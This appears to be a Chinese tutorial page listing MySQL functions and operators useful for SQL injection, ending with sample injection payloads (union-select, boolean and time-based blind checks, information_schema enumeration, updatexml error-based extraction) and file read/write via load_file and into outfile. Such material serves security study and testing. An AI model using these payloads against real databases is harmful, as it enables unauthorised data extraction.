mysql注入方法邏輯運算及常用函式
Mysql內建函式:
https://dev.mysql.com/doc/refman/5.7/en/dynindex-function.htmlMySql注入常用函式
- system_user() 系統使用者名稱 select system_user()
- user() 使用者名稱 select user()
- current_user() 當前使用者名稱 select current_user()
- session_user() 連線資料庫的使用者名稱 select session_user()
- database() 資料庫名 use security; select dadatabase()
- version() 資料庫版本 select version();
- @@version 資料庫版本
- @@datadir 資料庫路徑
- @@basedir 資料庫安裝路徑
- @@version_compile_os 作業系統
- count() 返回執行結果數量
- concat() 沒有分割符地字串 select concat(username,password) from users;
- concat_ws() 含有分割符地連線字串 select concat_ws(':', username, password) from users; select concat_ws(0x7e, username, password) from users;
- group_concat() 連線一個組的所有字串,並以逗號分隔每一條資料 select group_concat(username) from users;
- load_file() 讀取本地檔案 select load_file('/tmp/mysql');
- into outfile 寫檔案 select 'mysql' into outfile '/tmp/mysql'
- ascii() 字串的ASCII程式碼值
- ord() 返回字串第一個字元的ASCII值
- mid() 返回一個字串的一部分 select mid('mysql',1,1);
- substr() 返回一個字串的一部分 select substr('mysql',1,1);
- length() 返回字串的長度
- left() 返回字串最左邊的幾個字元 select left('mysql',2);
- floor() 返回小於或等於x的最大整數 select floor(5.9);
- rand() 返回0和1之間的一個隨機數
- extractvalue()
- updatexml()
- sleep()
- if() select if(1>2,2,3);
- char() 返回ASCII程式碼字元組成的字串
- strcmp 比較字串 大1 ,小-1, =是0
- ifnull() 假如引數1不為NULL,則返回值為引數1,否則返回值為引數2 select ifnull(1,2); select ifnull(null,2);
- exp() 返回e的x次方 select exp(1);
mysql運算子.png
- between and
select id,username from users where id between 1 and 4; - in
select id,username from users where username in ('admin', 'tesdt'); - like
select id,username from users where username like 'ad';
select id,username from users where username like '%ad%'; - REGEXP 正則匹配
select user() regexp '^faf';
MySql邏輯運算
- and
- or
MySql注入語句樣例分析:
1, and 1=2 union select 1,2,3--
2, select user() regexp '^ro'
3, ascii(substr((select user()),1,1))=114
4, if(ascii(substr((select user()),1,1))=114,0,sleep(5))
5, (ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1))=9)
6, updatexml(1,concat(0x7e,(select @@version),0x73),1)
相關文章
- Oracle 函式大全(字串函式,數學函式,日期函式,邏輯運算函式,其他函式)Oracle函式字串
- 【Mysql學習】算術運算及字串,數值函式MySql字串函式
- 【Mysql 學習】算術運算及字串,數值函式MySql字串函式
- NumPy常用的位運算函式函式
- numpy學習回顧-數學函式及邏輯函式函式
- 二.Excel邏輯函式Excel函式
- java程式碼執行字串中的邏輯運算方法Java字串
- Linux Shell 邏輯運算子、邏輯表示式詳解Linux
- 計算幾何常用的函式/方法函式
- Sympy玩轉邏輯符號運算符號
- MySQL 常用函式MySql函式
- MySQL 常用函式。MySql函式
- MySQL常用函式MySql函式
- 計算機程式的思維邏輯 (11) - 初識函式計算機函式
- Mysql 常用函式(1)- 常用函式彙總MySql函式
- 【Numpy學習12】邏輯函式函式
- 邏輯迴歸 損失函式邏輯迴歸函式
- MySQL的四種運算子(算術運算子、比較運算子、邏輯運算子和位運算子)MySql
- 物聯網學習教程——邏輯運算子和邏輯表示式
- 建構函式顯式返回 this 在 new 運算及 call 方法中的比較函式
- Mysql 常用函式(15)- upper 函式MySql函式
- MongoDB之資料查詢(邏輯運算)MongoDB
- 2.3邏輯迴歸損失函式邏輯迴歸函式
- 計算機程式的思維邏輯 (93) – 函式式資料處理 (下)計算機函式
- 計算機程式的思維邏輯 (93) - 函式式資料處理 (下)計算機函式
- 計算機程式的思維邏輯 (92) - 函式式資料處理 (上)計算機函式
- Hive常用函式及自定義函式Hive函式
- javascript 冪函式運算JavaScript函式
- web前端學習教程,掌握核心邏輯運算Web前端
- 【Python爬蟲】邏輯運算練習題Python爬蟲
- MKL稀疏矩陣運算示例及函式封裝矩陣函式封裝
- java中equals方法與==邏輯運算子薦Java
- 大話Python函式底層邏輯Python函式
- 邏輯迴歸損失函式(cost function)邏輯迴歸函式Function
- MATLAB模糊邏輯工具箱函式Matlab函式
- MySQL常用函式彙總MySql函式
- mysql常用函式詳解MySql函式
- MySQL 5.5常用資訊函式MySql函式